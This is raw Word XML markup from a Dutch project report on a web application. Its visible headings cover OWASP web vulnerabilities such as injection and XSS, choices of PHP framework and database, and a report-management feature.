          <w:pgMar w:top="0" w:right="1440" w:bottom="0" w:left="1440" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318695B4" w14:textId="69BEE9DF" w:rsidR="0080388C" w:rsidRPr="004A7280" w:rsidRDefault="008D1592" w:rsidP="00C94890">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1020"/>
        </w:tabs>
        <w:sectPr w:rsidR="0080388C" w:rsidRPr="004A7280" w:rsidSect="00241096">
          <w:headerReference w:type="first" r:id="rId35"/>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="1417" w:bottom="23" w:left="1417" w:header="0"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61376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="725BD551" wp14:editId="3983E918">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-267674</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10732135" cy="7773374"/>
                <wp:effectExtent l="0" t="0" r="37465" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Rectangle 21"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="10732135" cy="7773374"/>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359F" id="Rectangle 21" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-21.05pt;width:845.05pt;height:612.1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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006E3740">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253173760" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D06D361" wp14:editId="335AFBAE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-706755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4803775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9077960" cy="1713230"/>
                <wp:effectExtent l="0" t="0" r="15240" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="778" name="Rounded Rectangle 778"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="9077960"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05D3" id="Rounded Rectangle 778" o:spid="_x0000_s1026" style="position:absolute;margin-left:-55.65pt;margin-top:378.25pt;width:714.8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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006E3740">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253172736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23E9854F" wp14:editId="542CE787">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-384810</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5035550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="754951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754951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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="006E3740" w:rsidRDefault="000E3238"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1" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-30.3pt;margin-top:396.5pt;width:594.4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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C569A10" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="006E3740" w:rsidRDefault="000E3238"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sidR="00A14BEE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252293120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4813F3E5" wp14:editId="6EC5205E">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0E3238" w:rsidRPr="00A14BEE" w:rsidRDefault="000E3238"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R4nwCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7AD5B74A" w14:textId="6D434390" w:rsidR="000E3238" w:rsidRPr="00A14BEE" w:rsidRDefault="000E3238"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1B77BB4C">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5B5923E8">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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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CLljcimAIAAJAFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJv&#10;RG9jLnhtbFBLAQItABQABgAIAAAAIQCsUENF4gAAAAsBAAAPAAAAAAAAAAAAAAAAAPAEAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA/wUAAAAA&#10;" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="685849B0" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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C1F07F8">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2F3D"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p>
    <w:bookmarkStart w:id="17" w:name="_Toc496292426"/>
    <w:p w14:paraId="08F8B394" w14:textId="357F31D0"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CE52C"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7"/>
    </w:p>
    <w:p w14:paraId="2A400921" w14:textId="37EED0AB" w:rsidR="00382817" w:rsidRPr="00382817" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc496292427"/>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00382817" w:rsidRPr="00382817">
        <w:t>Inleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>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821F2"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9" w:name="_Toc496292428"/>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00DA5B86">
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidR="004D61D9" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidR="00B674DC" w:rsidRPr="00723BE8">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="007F2C89">
        <w:t xml:space="preserve"> en de kwetsbaarheden</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>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3F840"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F06A"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20" w:name="_Toc496292429"/>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00FC3328">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="003B11B2" w:rsidRPr="00FC3328">
        <w:t>OWASP top 10 lijst</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>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4570A"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5EA4F11D" w:rsidR="00D96689" w:rsidRPr="00D173C6" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc496292430"/>
      <w:r>
        <w:t>3.2.2</w:t>
      </w:r>
      <w:r w:rsidR="00FE6C9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E848BF">
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00622A99">
        <w:t>Kwetsbaarheden</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="44031CB4" w14:textId="5C414F06" w:rsidR="00E12430" w:rsidRPr="008C7B6A" w:rsidRDefault="007A55BC" w:rsidP="00167992">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc496292431"/>
      <w:r w:rsidRPr="008C7B6A">
        <w:t xml:space="preserve">A1 </w:t>
      </w:r>
      <w:r w:rsidR="00F65ACF" w:rsidRPr="008C7B6A">
        <w:t>injectie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>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0E3238" w:rsidRPr="003808D6" w:rsidRDefault="000E3238"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bADcCAABs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alnA4491CfEb6HvoWC42uFF25YiI/MY88gLJyD+ICL1NBWFC4WJQ34&#10;H3/zp3yUEqOUtNiDFQ3fj8wLSvQ3iyKnhh0MPxj7wbBHswKEWuKEOZ5NPOCjHkzpwTzjeCzTLRhi&#10;luNdFY2DuYr9JOB4cbFc5iRsS8fixm4dT6UHYnfdM/PuIktEQe9h6E42e6dOn9vTvDxGkCpLl4jt&#10;WbzwjS2d9bmMX5qZX/c56+0nsfgJ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K+5mwA3AgAAbAQAAA4AAAAAAAAAAAAA&#10;AAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABR5B5vfAAAACgEAAA8AAAAAAAAA&#10;AAAAAAAAjwQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACbBQAAAAA=&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1E47D233" w14:textId="3A137D16" w:rsidR="000E3238" w:rsidRPr="003808D6" w:rsidRDefault="000E3238"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7">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0E3238" w:rsidRDefault="000E3238"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1fSUCAAAl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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3C10F22F" w14:textId="39719AA2" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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GxvzDYkAgAAJQQAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2Mu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAIngphPgAAAACwEAAA8AAAAAAAAAAAAAAAAAfAQAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPMAAACJBQAAAAA=&#10;" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0ADFBF2C" w14:textId="2ABF1F9D" w:rsidR="000E3238" w:rsidRDefault="000E3238"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E4CAD"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3" w:name="_Toc496292432"/>
      <w:r w:rsidRPr="008C7B6A">
        <w:t>A3 XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>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8">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9">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0E3238" w:rsidRPr="00500E88" w:rsidRDefault="000E3238"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WWZ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zNIB49Ya6gNqxkH/mLzl&#10;ly1e2xXz4ZY5fD2oI5wI4QY/UgG2FIYVJQ24n3/bj3gUNXop6fA1VtT/2DInKFFfDcr9pIiiISEZ&#10;8/LTDA330rN+6TFbfQ6ohQJnj+VpGfFBjUvpQD/i4FjFquhihmPtivLgRuM89FMCRw8Xq1WC4ZO1&#10;LFyZe8tj8tjoKMuH/SNzdtBuQNVfw/hy2eKVhHtsjDSw2gaQbdL3c1+HK8DnngQ6jKY4T17aCfU8&#10;QJe/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vbnWWZ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0E3238" w:rsidRPr="00500E88" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00CF1B56" w:rsidRDefault="000E3238"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4Rzk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6g6dD1AcoLkuGgGydv+UZi+S3z4Zk5nB/sH3ciPOFRKWgKCr1FSQ3u&#10;x9/8MR9lxSglDc5jQf33E3OCEvXVoOBxeAfDDcZhMMxJrwEbn+C2WZ5MfOCCGszKgX7BVVnFKhhi&#10;hmOtgobBXIduK3DVuFitUhKOqGVha3aWR+iB5n37wpztRQoo7yMMk8ryN1p1uUktuzoFJD4JGYnt&#10;WMQBiBcc7zQK/SrG/fn1nrJe/zCWPwE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PvH4Rz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0E3238" w:rsidRPr="00CF1B56" w:rsidRDefault="000E3238"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8369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4" w:name="_Toc496292433"/>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59627"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4"/>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306A0"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189FE"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5" w:name="_Toc496292434"/>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333B0"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5"/>
    </w:p>
    <w:p w14:paraId="711B9907" w14:textId="5A7BE0D6" w:rsidR="004A02C8" w:rsidRPr="0099118F" w:rsidRDefault="005B464A" w:rsidP="005B464A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc496292435"/>
      <w:r>
        <w:t xml:space="preserve">3.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="0099118F">
        <w:t>Inleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>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3A0D"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7" w:name="_Toc496292436"/>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E510"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7"/>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8" w:name="_Toc496292437"/>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AA76E"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4E8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55A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42">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987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9875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4DDC15F3" w14:textId="6B0A68F9" w:rsidR="000E3238" w:rsidRPr="00641B06" w:rsidRDefault="000E3238"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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4DDC15F3" w14:textId="6B0A68F9" w:rsidR="000E3238" w:rsidRPr="00641B06" w:rsidRDefault="000E3238"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9" w:name="_Toc496292438"/>
      <w:r>
        <w:t xml:space="preserve">3.4.7 </w:t>
      </w:r>
      <w:r w:rsidR="003E572F" w:rsidRPr="003E572F">
        <w:t>Conclusie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>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0E3238" w:rsidRPr="004749D1" w:rsidRDefault="000E3238"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l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9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L7LOUOQIAAHgEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQB6n6Oe4QAAAAoBAAAPAAAA&#10;AAAAAAAAAAAAAJEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="729DC7E2" w14:textId="515EFC9D" w:rsidR="000E3238" w:rsidRPr="004749D1" w:rsidRDefault="000E3238"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4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F0184"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0E3238" w:rsidRPr="00B2596E" w:rsidRDefault="000E3238"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6/m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T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1O6/mjcCAAB4BAAADgAAAAAAAAAA&#10;AAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAz/5aDuEAAAAIAQAADwAAAAAA&#10;AAAAAAAAAACPBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAJ0FAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B992CF2" w14:textId="1DE9CE4C" w:rsidR="000E3238" w:rsidRPr="00B2596E" w:rsidRDefault="000E3238"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39A2451"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bookmarkStart w:id="30" w:name="_Toc496292439"/>
    <w:p w14:paraId="3584407D" w14:textId="2C1EC5EB"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34E10"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C52533">
        <w:t>3.5</w:t>
      </w:r>
      <w:r w:rsidR="00A878AF" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F1550D">
        <w:t>Technologie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>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1" w:name="_Toc496292440"/>
      <w:r>
        <w:t xml:space="preserve">3.5.1 </w:t>
      </w:r>
      <w:r w:rsidR="0070741F" w:rsidRPr="00486596">
        <w:t>Web Application Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>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1DA54CB1" w:rsidR="00A77292" w:rsidRDefault="00C003AB" w:rsidP="00A5093B">
      <w:r>
        <w:t>In tabel 3.7</w:t>
      </w:r>
      <w:r w:rsidR="003E5093">
        <w:t xml:space="preserve">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BF1A"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28F1"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42AB139B" w:rsidR="008D5DD7" w:rsidRPr="0093287C" w:rsidRDefault="008D5DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093287C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Symphony2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C9336" w14:textId="797DDECD" w:rsidR="008D5DD7" w:rsidRDefault="00801FA5">
      <w:r>
        <w:t xml:space="preserve">Wat voor Zend geldt, geldt ook voor Symphony. Het is een PHP Framework dat </w:t>
      </w:r>
      <w:r w:rsidR="00A706A6">
        <w:t>bedoeld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is voor grote complexe enterprice projecten. </w:t>
      </w:r>
      <w:r w:rsidR="00600F5F">
        <w:t xml:space="preserve">Het heeft een grote set van herbruikbare componenten. Veel van deze componenten </w:t>
      </w:r>
      <w:r w:rsidR="00BB4E5D">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30B52A5D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1120523</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2BDA" id="Rectangle 27" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-88.2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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00600F5F">
        <w:t>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2" w:name="_Toc496292441"/>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91E4"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E76906">
        <w:t xml:space="preserve">3.5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00607C53">
        <w:t>Database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>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241096">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0E3238" w:rsidRPr="001C726A" w:rsidRDefault="000E3238"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2"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Nd3v+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0E3238" w:rsidRPr="001C726A" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238" w:rsidP="004A26CE"/>
                          <w:p w14:paraId="2FD96CDE" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"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3"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d0cms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0E3238" w:rsidRDefault="000E3238" w:rsidP="004A26CE"/>
                    <w:p w14:paraId="2FD96CDE" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"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241096">
          <w:headerReference w:type="first" r:id="rId46"/>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0E3238" w:rsidRPr="00A14BEE" w:rsidRDefault="000E323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4"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="787C2EDC" w14:textId="7E5CBA09" w:rsidR="000E3238" w:rsidRPr="00A14BEE" w:rsidRDefault="000E323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9068"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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00CA4BC9" w:rsidRDefault="000E3238"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5"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SWZ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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="065D94A9" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00CA4BC9" w:rsidRDefault="000E3238" w:rsidP="006705F1"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00435E58">
        <w:tab/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="33" w:name="_Toc496292442"/>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93796"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3"/>
    </w:p>
    <w:p w14:paraId="25E8961C" w14:textId="6A43FC74" w:rsidR="00F35D5A" w:rsidRPr="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00AD1E97">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc496292443"/>
      <w:r>
        <w:t>Introductie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>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D105"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0E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238"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6"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Dr26SIegIAAGQFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAH6wsj3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0173E4F7" w14:textId="50BFEF72" w:rsidR="000E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238" w:rsidP="005776D0">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="008F7930">
                        <w:t>Admin</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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50"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0E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238"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O6WedXoCAABkBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAyOqWON0AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4912BA45" w14:textId="2546C6E1" w:rsidR="000E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="008A0E3E" w:rsidRDefault="000E3238">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58"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skX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2Pe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LcuskXoCAABlBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAeTqkpd0AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1AA84A99" w14:textId="0D1B5880" w:rsidR="000E3238" w:rsidRPr="008A0E3E" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="003F6932" w:rsidRDefault="000E3238"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9"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LkXkCAABl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Xx7LkXkCAABlBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAu5o1U94AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7BF9B3F5" w14:textId="29AE856C" w:rsidR="000E3238" w:rsidRPr="003F6932" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238"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0"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iFEZonsCAABkBQAA&#10;DgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAtpPJeN8AAAAL&#10;AQAADwAAAAAAAAAAAAAAAADTBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="25D5C477" w14:textId="61810C78" w:rsidR="000E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238"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1"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="36998011" w14:textId="52D20C53" w:rsidR="000E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00F17F39" w:rsidRDefault="000E3238">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2"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kdH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nZ0M8VVDtqc4BuTaKXNzU141ZEfBCB9oI6S7uO9/TRBpqSQ09xtobw82/8hKdx&#10;JSlnDe1ZyeOPjQiKM/PF0SB/HJ+epsXMj9PJ+TE9wqFkdShxG3sF1JYxXRUvM5nwaAZSB7BPdBIW&#10;ySuJhJPku+Q4kFfYbT+dFKkWiwyiVfQCb93Sy2Q6lTmN2mP7JILv5xFpkO9g2EgxezWWHTZpOlhs&#10;EHSdZzYVuqtq3wBa4zz1/clJd+LwnVEvh3H+Cw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BpVqR0dwIAAGAFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDIrLAb3wAAAAoBAAAP&#10;AAAAAAAAAAAAAAAAAM8EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32E9FADE" w14:textId="5A5FE504" w:rsidR="000E3238" w:rsidRPr="00F17F39" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238">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3"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C2UMRGeQIAAGAFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCLbrQj4AAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0B59963C" w14:textId="51E7E476" w:rsidR="000E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238">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4"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oxHgCAABg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yLDoxHgCAABgBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAHbxCT98AAAALAQAA&#10;DwAAAAAAAAAAAAAAAADQBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1BBDD562" w14:textId="419B3284" w:rsidR="000E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238">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5"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Aq43yieAIAAGIFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCHN7ot3gAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAANAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3992260D" w14:textId="3C9461C7" w:rsidR="000E3238" w:rsidRPr="0045370F" w:rsidRDefault="000E3238">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bookmarkStart w:id="35" w:name="_Toc496292444"/>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E5D82"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5"/>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53">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04620E4A"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A38E3">
              <w:t>CRUD)</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50F8EA6F"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w:t>
            </w:r>
            <w:r w:rsidR="002A38E3">
              <w:t>middel van een ORM</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4">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2907B"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03138">
          <w:headerReference w:type="default" r:id="rId55"/>
          <w:headerReference w:type="first" r:id="rId56"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1012" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00773B77">
        <w:t>Het verzenden en beheren van rapporten</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="36" w:name="_Toc496292445"/>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9071"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6"/>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0E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00D25B17" w:rsidRDefault="000E3238"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6"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8K3U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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1457BC19" w14:textId="5E30647D" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00D25B17" w:rsidRDefault="000E3238"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27101"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0E3238" w:rsidRPr="00A62C51" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00A62C51" w:rsidRDefault="000E3238"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7"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
